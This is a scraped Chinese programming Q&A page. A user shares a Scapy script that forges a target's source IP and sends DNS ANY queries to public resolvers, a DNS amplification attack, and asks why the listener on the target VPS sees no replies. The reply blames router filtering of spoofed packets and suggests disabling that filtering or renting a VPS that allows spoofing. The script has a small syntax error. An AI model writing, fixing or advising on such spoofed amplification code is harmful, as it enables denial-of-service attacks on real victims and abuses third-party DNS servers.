我编写了一个脚本来模拟DNS放大攻击
from scapy.all import *
target='XXXXXXXX'
for ip in ('8.8.8.8', '1.1.1.1')
packet = IP(src=target, dst=ip)/UDP(dport=53)/DNS(rd=1, qdcount=1, qd=DNSQR(qname='google.com', qtype='ANY'))
send(packet)
在目标机器中,我运行Netcat从DNS服务器获取响应
目标计算机是具有公共IP地址的VPS
ncat -nlvp 53
ncat -u -nlvp 53
但我没有得到任何回应,哪里错了
您的DNS放大可能无法工作,因为您使用伪造的ip地址发送它。您的网络路由器可能会阻止传出的伪造流量。唯一的尝试方法是禁用路由器上的网络流量过滤,或者购买启用了欺骗的专用服务器/vps
相关问题 更多 >
编程相关推荐